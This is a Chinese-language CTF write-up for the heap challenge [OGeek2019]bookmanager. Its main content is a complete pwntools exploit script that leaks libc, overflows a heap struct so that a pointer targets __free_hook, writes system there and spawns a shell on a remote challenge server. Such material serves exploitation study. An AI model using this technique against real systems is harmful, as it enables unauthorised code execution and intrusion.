[OGeek2019]bookmanager
做过的代码量最大的一个题
说出的好也好,不好也不好,利用点很简单,就是一个大规模的heapoverflow,就是逆起来有点儿难度
思路很简单,就是利用堆溢出覆盖结构体中的指针为__free_hook,然后改freehook
给👴整吐了,做了俩小时,然后本地到了最后一步,freehook每次内容都是一个奇怪的值,就是改不了system,然后远程一打就通了-.-||
1 from pwn import * 2 3 local = 0 4 5 binary = "./pwn" 6 7 if local == 1: 8 p = process(binary) 9 else: 10 p = remote("node3.buuoj.cn",27329) 11 12 def dbg(): 13 context.log_level = 'debug' 14 15 context.terminal = ['tmux','splitw','-h'] 16 17 def create_book(name): 18 p.sendafter('Name of the book you want to create:',name) 19 20 def add_chapter(name): 21 p.sendlineafter('Your choice:','1') 22 p.sendafter('Chapter name:',name) 23 24 def add_section(chapter_name,name): 25 p.sendlineafter('Your choice:','2') 26 p.sendafter('Which chapter do you want to add into:',chapter_name) 27 p.sendafter('Section name:',name) 28 29 def add_text(section_name,size,name): 30 p.sendlineafter('Your choice:','3') 31 p.sendafter('Which section do you want to add into:',section_name) 32 p.sendafter('How many chapters you want to write:',str(size)) 33 p.sendafter('Text:',name) 34 35 def remove_chapter(chapter_name): 36 p.sendlineafter('Your choice:','4') 37 p.sendafter('Chapter name:',chapter_name) 38 39 def remove_section(section_name): 40 p.sendlineafter('Your choice:','5') 41 p.sendafter('Section name:',section_name) 42 43 def remove_text(section_name): 44 p.sendlineafter('Your choice:','6') 45 p.sendafter('Section name:',section_name) 46 47 def show(): 48 p.sendlineafter('Your choice:','7') 49 50 def edit_text(sectionname,newname): 51 p.sendlineafter('Your choice:','8') 52 p.sendlineafter('What to update?(Chapter/Section/Text):','Text') 53 p.sendafter('Section name:',sectionname) 54 p.sendafter('New Text:',newname) 55 56 def edit_section(old_sectionname,newname): 57 p.sendlineafter('Your choice:','8') 58 p.sendlineafter('What to update?(Chapter/Section/Text):','Section') 59 p.sendafter('Section name:',old_sectionname) 60 p.sendafter('New Section name:',newname) 61 62 libc = ELF('./libc-2.23.so') 63 64 create_book('lemon') 65 66 print "==== step1: leak libc ====" 67 add_chapter('one') 68 add_section('one','c' * 8) 69 add_text('c' * 8,0x80,'d' * 8) 70 71 add_chapter('\x01') 72 73 remove_text('cccccccc') 74 add_text('cccccccc',0x80,'aaaaaaaa') 75 show() 76 __malloc_hook = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 88 - 0x10 77 libc_base = __malloc_hook - libc.sym['__malloc_hook'] 78 __free_hook = libc_base + libc.sym['__free_hook'] 79 system = libc_base + libc.sym['system'] 80 print "libc base: ",hex(libc_base) 81 82 print "==== step2: heapoverflow make heap pointer to free hook ====" 83 add_text('cccccccc',0x10,'\x01') 84 payload = '/bin/sh\x00' + 'a' * 8 + p64(0) + p64(0x41) + 'dddddddd' + p64(0) * 3 + p64(__free_hook) 85 add_section('one','dddddddd') 86 #dbg() 87 edit_text('cccccccc',payload) 88 edit_text('dddddddd',p64(system)) 89 remove_text('cccccccc') 90 91 #gdb.attach(p) 92 p.interactive()
